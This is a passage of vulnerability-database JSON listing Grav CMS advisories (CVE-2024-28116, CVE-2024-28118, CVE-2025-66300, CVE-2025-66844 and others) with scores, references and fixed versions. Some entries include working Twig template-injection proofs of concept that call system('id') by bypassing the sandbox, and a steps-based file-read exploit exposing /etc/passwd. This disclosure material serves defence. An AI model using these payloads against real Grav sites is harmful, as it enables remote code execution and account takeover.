:"VCID-hdsp-4e4r-c3fh","summary":"Server Side Template Injection (SSTI)\n### Summary\nDue to the unrestricted access to twig extension class from grav context, an attacker can redefine config variable. As a result, attacker can bypass previous patch.\n\n### Details\nThe twig context has a function declared called getFunction.\n```php\npublic function getFunction($name)\n    {\n        if (!$this->extensionInitialized) {\n            $this->initExtensions();\n        }\n\n        if (isset($this->functions[$name])) {\n            return $this->functions[$name];\n        }\n\n        foreach ($this->functions as $pattern => $function) {\n            $pattern = str_replace('\\\\*', '(.*?)', preg_quote($pattern, '#'), $count);\n\n            if ($count) {\n                if (preg_match('#^'.$pattern.'$#', $name, $matches)) {\n                    array_shift($matches);\n                    $function->setArguments($matches);\n\n                    return $function;\n                }\n            }\n        }\n\n        foreach ($this->functionCallbacks as $callback) {\n            if (false !== $function = \\call_user_func($callback, $name)) {\n                return $function;\n            }\n        }\n\n        return false;\n    }\n```\nThis function, if the value of `$name` does not exist in `$this->functions`, uses call_user_func to execute callback functions stored in `$this->functionCallbacks`.\n\nIt is possible to register arbitrary function using registerUndefinedFunctionCallback, but a callback that has already been registered exists and new callbacks added will not be executed.\n\nThe default function callback is as follows:\n```php\n$this->twig->registerUndefinedFunctionCallback(function (string $name) use ($config) {\n                $allowed = $config->get('system.twig.safe_functions');\n                if (is_array($allowed) and in_array($name, $allowed, true) and function_exists($name)) {\n                    return new TwigFunction($name, $name);\n    
            }\n                if ($config->get('system.twig.undefined_functions')) {\n                    if (function_exists($name)) {\n                        if (!Utils::isDangerousFunction($name)) {\n                            user_error(\"PHP function {$name}() was used as Twig function. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_functions`\", E_USER_DEPRECATED);\n\n                            return new TwigFunction($name, $name);\n                        }\n\n                        /** @var Debugger $debugger */\n                        $debugger = $this->grav['debugger'];\n                        $debugger->addException(new RuntimeException(\"Blocked potentially dangerous PHP function {$name}() being used as Twig function. If you really want to use it, please add it to system configuration: `system.twig.safe_functions`\"));\n                    }\n\n                    return new TwigFunction($name, static function () {});\n                }\n\n                return false;\n            });\n```\nIf you look at this function, if the value of system.twig.undefined_functions is false, it returns false.\nIn that case, it is possible for our registered callback to be executed.\n\nAt this time, the `Grav\\Common\\Config\\Config` class is loaded within the grav context, and access to the set method is allowed, making it possible to set the value of system.twig.undefined_functions to false.\nAs a result, an attacker can execute any arbitrarily registered callback function.\n\n### PoC\n```\n{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }}\n{% set a = grav.config.set('system.twig.undefined_functions',false) %}\n{{ grav.twig.twig.getFunction('id') }}\n```\n\n![image](https://user-images.githubusercontent.com/46442697/281371295-25174479-e9ab-40ca-8016-99c51f72d7a8.png)\n\n\n### Impact\nTwig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit 
pages.\nAs the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28118","reference_id":"","reference_type":"","scores":[{"value":"0.00394","scoring_system":"epss","scoring_elements":"0.60549","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28118"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-08T15:04:35Z/"}],"url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-08T15:04:35Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28118","reference_i
d":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28118"},{"reference_url":"https://github.com/advisories/GHSA-r6vw-8v8r-pmp4","reference_id":"GHSA-r6vw-8v8r-pmp4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r6vw-8v8r-pmp4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33336?format=json","purl":"pkg:composer/getgrav/grav@1.7.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"}],"aliases":["CVE-2024-28118","GHSA-r6vw-8v8r-pmp4"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hdsp-4e4r-c3fh"},{"url":"http
://public2.vulnerablecode.io/api/vulnerabilities/29957?format=json","vulnerability_id":"VCID-hwcx-1fp9-3bhh","summary":"Grav may be vulnerable to SSRF attack via Twig Templates\nIn grav <1.7.49.5, a SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66844","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17804","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66844"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/Yohane-Mashiro/grav_cve/issues/2","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-16T15:32:54Z/"}],"url":"https://github.com/Yohane-Mashiro/grav_cve/issues/2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66844","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66844"},{"reference_url":"https://github.com/advisories/GHSA-729w-j79f-2c34","reference_id":"GHSA-729w-j79f-2c34","reference_type"
:"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-729w-j79f-2c34"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/872248?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.1"}],"aliases":["CVE-2025-66844","GHSA-729w-j79f-2c34"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hwcx-1fp9-3bhh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30376?format=json","vulnerability_id":"VCID-ng3h-ees8-vubs","summary":"Grav is vulnerable to Arbitrary File Read\n### Summary\n\n- A low privilege user account with page editing privilege can read any server files using \"Frontmatter\" form.\n- This includes Grav user account files - /grav/user/accounts/*.yaml. 
This file stores the hashed user password, 2FA secret, and the password reset token.\n- This can allow an adversary to compromise any registered account by resetting a password for a user to get access to the password reset token from the file or by cracking the hashed password.\n\n### Details\n_The vulnerability can be found in /user/plugins/form/templates/forms/fields/display/display.html.twig_\n![image](https://github.com/getgrav/grav/assets/28057767/953dbdf1-310f-4c8e-866c-8470d70cc11d)\n\n\n### PoC\n1.\tThis PoC was conducted on Grav CMS version 1.7.46 and Admin Plugin version 1.10.46\n \n![image](https://github.com/getgrav/grav/assets/28057767/6c8607d6-cea3-4699-8a5a-8a04d047676f)\n\n2.\tGo to “http://grav.local/admin/pages”, then create a new page with the “Page Template” option set to “Form”.\n \n![image](https://github.com/getgrav/grav/assets/28057767/451fe8bc-2e2e-4f8a-a548-385aca6d5504)\n\n3.\tThen go to “Expert” and in the Frontmatter input box use the following form template.\n\n![image](https://github.com/getgrav/grav/assets/28057767/9e44758a-021a-45fd-9e26-03abbf8095ef)\n\n4.\tSave the page and go to the preview or published page; you will see the content of the “/etc/passwd” file on the server.\n \n![image](https://github.com/getgrav/grav/assets/28057767/94dc2363-10e1-4e74-81e4-6c7a09db4dff)\n\n\n\n### Impact\nThis can allow a low-privileged user to perform a full account takeover of other registered users, including Administrators. This can also allow an adversary to read any file on the web server. 
Due to insufficient permission verification, a user who can write a page can also use the frontmatter feature through the IDOR vulnerability [PoC IDOR](https://www.youtube.com/watch?v=EU1QA0idoWE&ab_channel=%EA%B9%80%EC%A2%85%EB%AF%BC) mentioned in [CVE-2024-2792](https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66300","reference_id":"","reference_type":"","scores":[{"value":"0.00073","scoring_system":"epss","scoring_elements":"0.22328","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66300"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:08:33Z/"}],"url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-p4ww-mcp9-j6f2","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/
2025-12-02T14:08:33Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-p4ww-mcp9-j6f2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66300","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66300"},{"reference_url":"https://github.com/advisories/GHSA-p4ww-mcp9-j6f2","reference_id":"GHSA-p4ww-mcp9-j6f2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p4ww-mcp9-j6f2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66300","GHSA-p4ww-mcp9-j6f2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ng3h-ees8-vubs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11478?format=json","vulnerability_id":"VCID-p24p-fcpe-xbah","summary":"Server-Side Template Injection (SSTI) with Grav CMS security sandbox bypass\n### Summary\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox.\n\n### Details\nThe Grav CMS implements a custom sandbox to protect the powerful Twig methods \"registerUndefinedFunctionCallback()\" and \"registerUndefinedFilterCallback()\", in order to avoid SSTI attacks by denying the calling of dangerous PHP functions into the Twig template 
directives (such as: \"exec()\", \"passthru()\", \"system()\", etc.). \nThe current defenses are based on a blacklist of prohibited functions (PHP, Twig), checked through the \"isDangerousFunction()\" method called in the file \"system/src/Grav/Common/Twig.php\":\n\n```php\n...\n$this->twig = new TwigEnvironment($loader_chain, $params);\n\n$this->twig->registerUndefinedFunctionCallback(function (string $name) use ($config) {\n    $allowed = $config->get('system.twig.safe_functions');\n    if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {\n        return new TwigFunction($name, $name);\n    }\n    if ($config->get('system.twig.undefined_functions')) {\n        if (function_exists($name)) {\n            if (!Utils::isDangerousFunction($name)) {\n                user_error(\"PHP function {$name}() was used as Twig function. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_functions`\", E_USER_DEPRECATED);\n\n                return new TwigFunction($name, $name);\n            }\n\n           /** @var Debugger $debugger */\n           $debugger = $this->grav['debugger'];\n           $debugger->addException(new RuntimeException(\"Blocked potentially dangerous PHP function {$name}() being used as Twig function. 
If you really want to use it, please add it to system configuration: `system.twig.safe_functions`\"));\n        }\n\n        return new TwigFunction($name, static function () {});\n    }\n\n    return false;\n});\n\n$this->twig->registerUndefinedFilterCallback(function (string $name) use ($config) {\n    $allowed = $config->get('system.twig.safe_filters');\n    if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {\n        return new TwigFilter($name, $name);\n    }\n    if ($config->get('system.twig.undefined_filters')) {\n        if (function_exists($name)) {\n            if (!Utils::isDangerousFunction($name)) {\n                user_error(\"PHP function {$name}() used as Twig filter. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_filters`\", E_USER_DEPRECATED);\n                return new TwigFilter($name, $name);\n            }\n...\n```\nIn the code above it can be seen that the calls of the \"isDangerousFunction()\" are not performed when the method/filter in the \"$name\" variable has been considered safe. 
A function can be defined safe only by an administrator user, by adding it into the configuration properties \"system.twig.safe_functions\" and/or \"system.twig.safe_filters\" (a sort of whitelists that by default are empty) of the configuration file \"system/config/system.yaml\".\n\nIt is to note that within the \"system/src/Grav/Common/Twig.php\" file a Twig class is defined (with its constructor, methods and attributes) and in particular the Twig object (and environment) is instantiated on it:\n```php\n/**\n * Class Twig\n * @package Grav\\Common\\Twig\n */\nclass Twig\n{\n    /** @var Environment */\n    public $twig;\n    /** @var array */\n    public $twig_vars = [];\n    /** @var array */\n    public $twig_paths;\n    /** @var string */\n    public $template;\n...\n   /**\n     * Constructor\n     *\n     * @param Grav $grav\n     */\n    public function __construct(Grav $grav)\n    {\n        $this->grav = $grav;\n        $this->twig_paths = [];\n    }\n\n    /**\n     * Twig initialization that sets the twig loader chain, then the environment, then extensions\n     * and also the base set of twig vars\n     *\n     * @return $this\n     */\n    public function init()\n    {\n        if (null === $this->twig) {\n            /** @var Config $config */\n            $config = $this->grav['config'];\n...\n```\nSince the security sandbox does not protect the Twig object it is possible to interact with it (e.g. call its methods, read/write its attributes) through opportunely crafted Twig template directives injected on a web page. 
\nThen an authenticated editor user could be able to add arbitrary functions into the Twig attributes \"system.twig.safe_functions\" and \"system.twig.safe_filters\" in order to circumvent the Grav CMS sandbox.\n\n\n### PoC\nAn authenticated user with the permissions to edit a page (having Twig processing enabled) on the Grav CMS admin console, could create/edit a web page containing a malicious template directive to execute arbitrary OS commands on the remote web server.\nFor instance, in order to abuse the vulnerability and execute the prohibited \"system('id')\" code, bypassing the sandbox, the editor could generate a web page containing the following template directives:\n```\n{% set arr = {'1':'system', '2':'foo'} %}\n{{ var_dump(grav.twig.twig_vars['config'].set('system.twig.safe_functions', arr)) }}\n{{ system('id') }}\n```\nOnce saved the malicious page could be accessed by unauthenticated users to execute the \"system('id')\" code on the remote server hosting the vulnerable Grav CMS.\n\n\n### Impact\nIt is possible to execute remote code on the underlying server and compromise it.\n\n\n### Tested version\nGrav CMS v1.7.43\n\n\n### Reported by\nMaurizio 
Siddu","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28116","reference_id":"","reference_type":"","scores":[{"value":"0.62168","scoring_system":"epss","scoring_elements":"0.98376","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28116"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-01T20:55:43Z/"}],"url":"https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-01T20:55:43Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28116","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A
:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28116"},{"reference_url":"https://github.com/advisories/GHSA-c9gp-64c4-2rrh","reference_id":"GHSA-c9gp-64c4-2rrh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c9gp-64c4-2rrh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33336?format=json","purl":"pkg:composer/getgrav/grav@1.7.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"}],"aliases":["CVE-2024-28116","GHSA-c9gp-64c4-2rrh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p24p-fcpe-xbah"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38762?format=json","vulnerability_id":"VCID-ppnh-1zmd-t3c5","summary":"Hi,\n\nactually we 
have sent the bug report to [security@getgrav.org](mailto:security@getgrav.org) on 27th March 2023 and on 10th April 2023.\n\n# Grav Server-side Template Injection (SSTI) via Twig Default Filters\n\n## Summary:  \n| **Product**             | Grav CMS                                      |\n| ----------------------- | --------------------------------------------- |\n| **Vendor**              | Grav                                          |\n| **Severity**            | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution |\n| **Affected Versions**   | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) |\n| **Tested Versions**     | v1.7.40                                       |\n| **Internal Identifier** | STAR-2023-0008                                |\n| **CVE Identifier**      | TBD                                           |\n| **CWE(s)**              | CWE-184: Incomplete List of Disallowed Inputs, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine |\n\n## CVSS3.1 Scoring System:  \n**Base Score:** 7.2 (High)  \n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`  \n| **Metric**                   | **Value** |\n| ---------------------------- | --------- |\n| **Attack Vector (AV)**       | Network   |\n| **Attack Complexity (AC)**   | Low       |\n| **Privileges Required (PR)** | High      |\n| **User Interaction (UI)**    | None      |\n| **Scope (S)**                | Unchanged |\n| **Confidentiality \\(C)**     | High      |\n| **Integrity (I)**            | High      |\n| **Availability (A)**         | High      |\n\n## Product Overview:  \nGrav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. 
It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.\n\n## Vulnerability Summary:  \nThe patch for [CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/), a server-side template injection vulnerability in Grav leveraging the default `filter()` function, did not block other built-in functions exposed by Twig's Core Extension that could be used to invoke arbitrary unsafe functions, thereby allowing for remote code execution.\n\n## Vulnerability Details:  \nTwig comes with an extension known as the [Core Extension](https://github.com/twigphp/Twig/blob/v1.44.7/src/Extension/CoreExtension.php) that is enabled by default when initialising a new [Twig environment](https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148). Twig's Core Extension provides multiple built-in filters, such as the `filter()` function, which can be used in Twig templates. \n\n[CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/) leverages the default `filter()` filter function in Twig to invoke arbitrary unsafe functions. 
This was patched by overriding the default `filter()` filter function in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) of Grav v1.7.34 to perform validation checks on the arguments passed to `filter()`:\n~~~diff php\n...\nclass GravExtension extends AbstractExtension implements GlobalsInterface\n{\n    ...\n    public function getFilters(): array\n    {\n        return [\n            ...\n            // Security fix\n+           new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]),\n        ];\n    }\n    \n    ...\n\n+   /**\n+    * @param Environment $env\n+    * @param array $array\n+    * @param callable|string $arrow\n+    * @return array|CallbackFilterIterator\n+    * @throws RuntimeError\n+    */\n+   function filterFilter(Environment $env, $array, $arrow)\n+   {\n+       if (is_string($arrow) && Utils::isDangerousFunction($arrow)) {\n+           throw new RuntimeError('Twig |filter(\"' . $arrow . '\") is not allowed.');\n+       }\n+\n+       return \\twig_array_filter($env, $array, $arrow);\n+   }\n}\n~~~\n\nHowever, looking at the source code of [/src/Extension/CoreExtension.php](https://github.com/twigphp/Twig/blob/v1.44.7/src/Extension/CoreExtension.php) of Twig, alternative default Twig filters could also be used to invoke arbitrary functions:\n~~~php\n...\nclass CoreExtension extends AbstractExtension\n{\n    ...\n    public function getFilters(): array\n    {\n        return [\n            ...\n            // array helpers\n            ...\n            new TwigFilter('filter', 'twig_array_filter', ['needs_environment' => true]), // unsafe\n            new TwigFilter('map', 'twig_array_map', ['needs_environment' => true]), // unsafe\n            new TwigFilter('reduce', 'twig_array_reduce', ['needs_environment' => true]), // unsafe\n        ];\n    }\n~~~\n\nThe three filter functions above respectively call `array_filter()`, `array_map()` and `array_reduce()`. 
